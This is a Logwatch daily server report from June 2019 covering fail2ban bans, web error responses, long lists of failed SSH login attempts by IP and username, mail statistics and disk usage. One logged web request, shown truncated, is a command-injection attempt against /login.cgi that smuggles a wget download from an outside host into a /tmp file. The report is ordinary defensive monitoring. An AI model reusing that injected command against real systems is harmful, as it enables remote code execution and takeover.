04:42
################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Wed Jun 12 04:42:08 2019
Date Range Processed: yesterday
( 2019-Jun-11 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [434:437]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
A total of 2 sites probed the server
5.188.210.101
66.240.205.34
Requests with error response codes
400 Bad Request
/socket.io/?noteId=Mp2j3pRqRsqyarkZlU5zXQ& ... 6te_t4NEFlTABeT: 3 Time(s)
/socket.io/?noteId=Mp2j3pRqRsqyarkZlU5zXQ& ... JY-zSh0qa2NABeU: 3 Time(s)
/socket.io/?noteId=Mp2j3pRqRsqyarkZlU5zXQ& ... QqHxZ5KhblhABeX: 3 Time(s)
/socket.io/?noteId=Mp2j3pRqRsqyarkZlU5zXQ& ... flnIJcXtl3SABeW: 3 Time(s)
null: 3 Time(s)
/: 2 Time(s)
/socket.io/?noteId=Mp2j3pRqRsqyarkZlU5zXQ& ... 0kGIgyBwNRlABeV: 2 Time(s)
/socket.io/?noteId=Mp2j3pRqRsqyarkZlU5zXQ& ... DRqkEpzq-I1ABeY: 2 Time(s)
/socket.io/?noteId=Mp2j3pRqRsqyarkZlU5zXQ& ... F3mnCzGwsLCABea: 2 Time(s)
/socket.io/?noteId=Mp2j3pRqRsqyarkZlU5zXQ& ... G9kFKG3BORzABeb: 2 Time(s)
/socket.io/?noteId=NqXFlx-0RMCv9Q793zPtWA& ... yCjCtl2GzlhABdg: 2 Time(s)
mstshash=Administr: 2 Time(s)
/login.cgi?cli=aa%20aa%27;wget%20http://68 ... h%20/tmp/kh%27$: 1 Time(s)
/socket.io/?noteId=Mp2j3pRqRsqyarkZlU5zXQ& ... Qxqf3YJqA8_ABeS: 1 Time(s)
http://5.188.210.101/echo.php: 1 Time(s)
404 Not Found
/robots.txt: 37 Time(s)
/berlin/apple-touch-icon.png: 3 Time(s)
/reader/1994-wi-reader_hb94.pdf: 1 Time(s)
/reader/2016_sose_konstanz_lang.pdf: 1 Time(s)
/wp-login.php: 1 Time(s)
499 (undefined)
/build/emojify.js/dist/css/basic/emojify.min.css: 3 Time(s)
/build/font-pack.2c73dce02b1eaa3a3b4e.css: 3 Time(s)
/fonts/SourceSansPro-Regular.woff: 3 Time(s)
/apple-touch-icon.png: 1 Time(s)
/build/260ef443edb4dfd026d82e2b21a4c75c.woff: 1 Time(s)
/build/af7ae505a9eed503f8b8e6982036873e.woff2: 1 Time(s)
/build/index-styles-pack.2c73dce02b1eaa3a3b4e.css: 1 Time(s)
/favicon.png: 1 Time(s)
/fonts/SourceCodePro-Medium.woff: 1 Time(s)
/fonts/SourceCodePro-Regular.woff: 1 Time(s)
/fonts/SourceSansPro-Italic.woff: 1 Time(s)
/fonts/SourceSansPro-Semibold.woff: 1 Time(s)
500 Internal Server Error
/: 32 Time(s)
/otsmobile/app/mgs/mgw.htm?operationType=c ... 224875090&sign=: 1 Time(s)
/robots.txt: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
unknown (cpe-74-141-132-233.kya.res.rr.com): 60 Time(s)
unknown (201.17.24.195): 52 Time(s)
unknown (bfay1.pndsl.co.uk): 49 Time(s)
unknown (211.253.10.96): 46 Time(s)
unknown (139.219.107.11): 44 Time(s)
unknown (46.209.114.138): 44 Time(s)
unknown (186.207.77.127): 43 Time(s)
unknown (101.124.13.243): 42 Time(s)
unknown (114.242.143.121): 42 Time(s)
unknown (115.88.201.58): 41 Time(s)
unknown (42.159.11.136): 41 Time(s)
unknown (106.13.96.115): 40 Time(s)
unknown (128.199.143.252): 39 Time(s)
unknown (106.13.47.252): 38 Time(s)
unknown (106.12.114.111): 37 Time(s)
unknown (94.191.103.139): 37 Time(s)
unknown (tc210-201-88-65.static.apol.com.tw): 37 Time(s)
unknown (140.143.230.161): 36 Time(s)
unknown (49.ip-142-44-241.net): 35 Time(s)
unknown (68.183.29.124): 35 Time(s)
unknown (106.13.42.106): 34 Time(s)
unknown (118.24.71.83): 34 Time(s)
unknown (142.93.18.15): 34 Time(s)
unknown (162.243.158.198): 34 Time(s)
unknown (165.22.73.160): 32 Time(s)
unknown (80.211.69.250): 32 Time(s)
unknown (129.204.108.143): 31 Time(s)
unknown (27.148.193.66): 31 Time(s)
unknown (162.250.210.22): 29 Time(s)
unknown (67.218.96.156): 27 Time(s)
unknown (119.1.238.156): 26 Time(s)
unknown (139.199.112.85): 22 Time(s)
unknown (27.147.169.73): 16 Time(s)
unknown (168.194.160.165): 15 Time(s)
root (162.250.210.22): 13 Time(s)
root (165.22.73.160): 12 Time(s)
root (186.207.77.127): 12 Time(s)
root (bfay1.pndsl.co.uk): 12 Time(s)
root (tc210-201-88-65.static.apol.com.tw): 12 Time(s)
unknown (101.207.113.73): 12 Time(s)
root (201.17.24.195): 11 Time(s)
root (80.211.69.250): 11 Time(s)
root (cpe-74-141-132-233.kya.res.rr.com): 11 Time(s)
unknown (213-47-38-104.cable.dynamic.surfer.at): 11 Time(s)
unknown (59.108.46.18): 11 Time(s)
root (106.12.114.111): 10 Time(s)
root (142.93.18.15): 10 Time(s)
root (106.13.47.252): 9 Time(s)
root (118.24.71.83): 9 Time(s)
root (162.243.158.198): 9 Time(s)
root (46.209.114.138): 9 Time(s)
root (139.219.107.11): 8 Time(s)
root (94.191.103.139): 8 Time(s)
unknown (93.51.247.178): 8 Time(s)
root (101.124.13.243): 7 Time(s)
root (106.13.42.106): 7 Time(s)
root (129.204.108.143): 7 Time(s)
root (139.199.112.85): 7 Time(s)
root (211.253.10.96): 7 Time(s)
root (114.242.143.121): 6 Time(s)
root (221.216.175.96): 6 Time(s)
root (c-71-198-140-17.hsd1.ca.comcast.net): 6 Time(s)
unknown (179.ip-51-77-212.eu): 6 Time(s)
unknown (61.19.246.239): 6 Time(s)
unknown (69.158.249.61): 6 Time(s)
root (106.13.96.115): 5 Time(s)
root (115.88.201.58): 5 Time(s)
root (119.1.238.156): 5 Time(s)
root (128.199.143.252): 5 Time(s)
root (140.143.230.161): 5 Time(s)
root (27.148.193.66): 5 Time(s)
root (42.159.11.136): 5 Time(s)
root (49.ip-142-44-241.net): 5 Time(s)
root (68.183.29.124): 5 Time(s)
unknown (61.183.35.44): 5 Time(s)
unknown (95.58.194.141): 5 Time(s)
root (59.108.46.18): 4 Time(s)
root (67.218.96.156): 4 Time(s)
root (drangob.plus.com): 4 Time(s)
unknown (112.161.29.51): 4 Time(s)
unknown (123-51-146-85.ftth.glasoperator.nl): 4 Time(s)
unknown (124.128.225.190): 4 Time(s)
unknown (drangob.plus.com): 4 Time(s)
unknown (r190-0-159-94.ir-static.adinet.com.uy): 4 Time(s)
root (112.161.29.51): 3 Time(s)
root (213-47-38-104.cable.dynamic.surfer.at): 3 Time(s)
mysql (118.24.71.83): 2 Time(s)
root (140.143.130.52): 2 Time(s)
root (168.194.160.165): 2 Time(s)
root (27.147.169.73): 2 Time(s)
unknown (140.143.130.52): 2 Time(s)
unknown (193.32.163.89): 2 Time(s)
unknown (static-93-163-87-188.ipcom.comunitel.net): 2 Time(s)
backup (118.24.71.83): 1 Time(s)
backup (cpe-74-141-132-233.kya.res.rr.com): 1 Time(s)
daemon (106.13.42.106): 1 Time(s)
daemon (118.24.71.83): 1 Time(s)
daemon (128.199.143.252): 1 Time(s)
games (tc210-201-88-65.static.apol.com.tw): 1 Time(s)
gnats (162.250.210.22): 1 Time(s)
irc (129.204.108.143): 1 Time(s)
list (106.12.114.111): 1 Time(s)
list (129.204.108.143): 1 Time(s)
list (186.207.77.127): 1 Time(s)
list (42.159.11.136): 1 Time(s)
list (68.183.29.124): 1 Time(s)
lp (106.13.47.252): 1 Time(s)
mail (128.199.143.252): 1 Time(s)
mail (tc210-201-88-65.static.apol.com.tw): 1 Time(s)
man (140.143.230.161): 1 Time(s)
man (168.194.160.165): 1 Time(s)
man (179.ip-51-77-212.eu): 1 Time(s)
mysql (165.22.73.160): 1 Time(s)
news (140.143.230.161): 1 Time(s)
news (162.250.210.22): 1 Time(s)
news (201.17.24.195): 1 Time(s)
nobody (tc210-201-88-65.static.apol.com.tw): 1 Time(s)
openproject (140.143.230.161): 1 Time(s)
postfix (211.253.10.96): 1 Time(s)
postfix (r190-0-159-94.ir-static.adinet.com.uy): 1 Time(s)
postgres (27.148.193.66): 1 Time(s)
postgres (94.191.103.139): 1 Time(s)
proxy (128.199.143.252): 1 Time(s)
root (101.207.113.73): 1 Time(s)
root (123-51-146-85.ftth.glasoperator.nl): 1 Time(s)
root (188.125.102.60): 1 Time(s)
root (58.242.82.11): 1 Time(s)
root (58.242.82.5): 1 Time(s)
root (93.51.247.178): 1 Time(s)
root (95.58.194.141): 1 Time(s)
root (r190-0-159-94.ir-static.adinet.com.uy): 1 Time(s)
smmsp (115.88.201.58): 1 Time(s)
smmsp (139.219.107.11): 1 Time(s)
smmsp (68.183.29.124): 1 Time(s)
sshd (93.51.247.178): 1 Time(s)
sshd (94.191.103.139): 1 Time(s)
sync (140.143.230.161): 1 Time(s)
temp (46.209.114.138): 1 Time(s)
temp (49.ip-142-44-241.net): 1 Time(s)
temp (80.211.69.250): 1 Time(s)
unknown (117.244.101.225): 1 Time(s)
unknown (151.ip-164-132-225.eu): 1 Time(s)
unknown (156.204.238.8): 1 Time(s)
unknown (180.89.58.27): 1 Time(s)
unknown (194.44.128.131): 1 Time(s)
unknown (ip-176-199-252-205.hsi06.unitymediagroup.de): 1 Time(s)
unknown (ip-178-203-177-136.hsi10.unitymediagroup.de): 1 Time(s)
uucp (162.250.210.22): 1 Time(s)
www-data (42.159.11.136): 1 Time(s)
www-data (49.ip-142-44-241.net): 1 Time(s)
www-data (94.191.103.139): 1 Time(s)
Invalid Users:
Unknown Account: 1338 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
11 Miscellaneous warnings
20.999K Bytes accepted 21,503
20.999K Bytes sent via SMTP 21,503
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
1 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
1 Total 4xx Rejects 100.00%
======== ==================================================
201 Connections
189 Connections lost (inbound)
201 Disconnections
1 Removed from queue
1 Sent via SMTP
10 Timeouts (inbound)
7 Hostname verification errors (FCRDNS)
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin
------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End
-------------------------
--------------------- SSHD Begin ------------------------
Disconnecting after too many authentication failures for user:
invalid : 2 Time(s)
root : 2 Time(s)
Failed logins from:
27.147.169.73: 2 times
27.148.193.66: 6 times
42.159.11.136: 7 times
46.209.114.138: 10 times
51.77.212.179 (179.ip-51-77-212.eu): 1 time
58.242.82.5: 3 times
58.242.82.11: 4 times
59.108.46.18: 4 times
67.218.96.156: 4 times
68.183.29.124: 7 times
71.198.140.17 (c-71-198-140-17.hsd1.ca.comcast.net): 6 times
74.141.132.233 (cpe-74-141-132-233.kya.res.rr.com): 12 times
80.211.69.250 (host250-69-211-80.serverdedicati.aruba.it): 12 times
80.229.16.54 (drangob.plus.com): 4 times
80.229.253.212 (bfay1.pndsl.co.uk): 12 times
85.146.51.123 (123-51-146-85.ftth.glasoperator.nl): 1 time
93.51.247.178 (srvmail.smartmoda.com): 2 times
94.191.103.139: 11 times
95.58.194.141 (95.58.194.141.megaline.telecom.kz): 1 time
101.124.13.243: 7 times
101.207.113.73: 1 time
106.12.114.111: 11 times
106.13.42.106: 8 times
106.13.47.252: 10 times
106.13.96.115: 5 times
112.161.29.51: 3 times
114.242.143.121: 6 times
115.88.201.58: 6 times
118.24.71.83: 13 times
119.1.238.156: 5 times
128.199.143.252: 8 times
129.204.108.143: 9 times
139.199.112.85: 7 times
139.219.107.11: 9 times
140.143.130.52: 2 times
140.143.230.161: 9 times
142.44.241.49 (49.ip-142-44-241.net): 7 times
142.93.18.15: 10 times
162.243.158.198: 9 times
162.250.210.22: 16 times
165.22.73.160: 13 times
168.194.160.165 (165.160.194.168.rfc6598.dynamic.copelfibra.com.br): 3 times
186.207.77.127 (bacf4d7f.virtua.com.br): 13 times
188.125.102.60: 1 time
190.0.159.94 (r190-0-159-94.ir-static.adinet.com.uy): 2 times
201.17.24.195 (ns01.macrodados.com.br): 12 times
210.201.88.65 (TC210-201-88-65.static.apol.com.tw): 15 times
211.253.10.96: 8 times
213.47.38.104 (213-47-38-104.cable.dynamic.surfer.at): 3 times
221.216.175.96: 6 times
Illegal users from:
undef: 987 times
27.147.169.73: 16 times
27.148.193.66: 31 times
42.159.11.136: 41 times
46.209.114.138: 44 times
51.77.212.179 (179.ip-51-77-212.eu): 6 times
59.108.46.18: 11 times
61.19.246.239: 6 times
61.183.35.44: 5 times
67.218.96.156: 27 times
68.183.29.124: 35 times
69.158.249.61: 6 times
74.141.132.233 (cpe-74-141-132-233.kya.res.rr.com): 60 times
80.211.69.250 (host250-69-211-80.serverdedicati.aruba.it): 32 times
80.229.16.54 (drangob.plus.com): 4 times
80.229.253.212 (bfay1.pndsl.co.uk): 49 times
85.146.51.123 (123-51-146-85.ftth.glasoperator.nl): 4 times
93.51.247.178 (srvmail.smartmoda.com): 8 times
94.191.103.139: 37 times
95.58.194.141 (95.58.194.141.megaline.telecom.kz): 5 times
101.124.13.243: 42 times
101.207.113.73: 12 times
106.12.114.111: 37 times
106.13.42.106: 34 times
106.13.47.252: 38 times
106.13.96.115: 40 times
112.161.29.51: 4 times
114.242.143.121: 42 times
115.88.201.58: 41 times
117.244.101.225: 1 time
118.24.71.83: 34 times
119.1.238.156: 26 times
124.128.225.190: 6 times
128.199.143.252: 39 times
129.204.108.143: 31 times
139.162.122.110 (scan-8.security.ipip.net): 1 time
139.199.112.85: 22 times
139.219.107.11: 44 times
140.143.130.52: 2 times
140.143.230.161: 36 times
142.44.241.49 (49.ip-142-44-241.net): 35 times
142.93.18.15: 34 times
156.204.238.8 (host-156.204.8.238-static.tedata.net): 1 time
162.243.158.198: 34 times
162.250.210.22: 29 times
164.132.225.151 (151.ip-164-132-225.eu): 1 time
165.22.73.160: 32 times
168.194.160.165 (165.160.194.168.rfc6598.dynamic.copelfibra.com.br): 15 times
176.199.252.205 (ip-176-199-252-205.hsi06.unitymediagroup.de): 1 time
178.203.177.136 (ip-178-203-177-136.hsi10.unitymediagroup.de): 1 time
180.89.58.27: 1 time
186.207.77.127 (bacf4d7f.virtua.com.br): 43 times
188.87.163.93 (static-93-163-87-188.ipcom.comunitel.net): 2 times
190.0.159.94 (r190-0-159-94.ir-static.adinet.com.uy): 4 times
193.32.163.89 (srv.eqaltech.su): 2 times
194.44.128.131: 1 time
201.17.24.195 (ns01.macrodados.com.br): 52 times
210.201.88.65 (TC210-201-88-65.static.apol.com.tw): 37 times
211.253.10.96: 46 times
213.47.38.104 (213-47-38-104.cable.dynamic.surfer.at): 11 times
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/vzfs 400G 242G 159G 61% /
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################
2324
days inactive
2324
days old
0 comments
1 participants
participants (1)
-
root@zapf.in